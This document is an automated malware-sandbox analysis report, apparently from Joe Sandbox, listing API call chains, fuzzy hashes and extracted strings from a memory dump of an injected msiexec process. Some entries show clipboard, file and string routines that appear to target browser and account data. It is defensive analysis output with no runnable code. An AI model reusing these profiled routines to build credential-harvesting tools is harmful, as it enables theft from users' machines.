                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                      • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                      • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                      • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                      • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                      • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                      • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                      APIs
                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                      APIs
                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                      • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2628231878-0
                                                                                                                                                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                      APIs
                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                      APIs
                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                      APIs
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                      • API String ID: 577499730-1134094380
                                                                                                                                                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
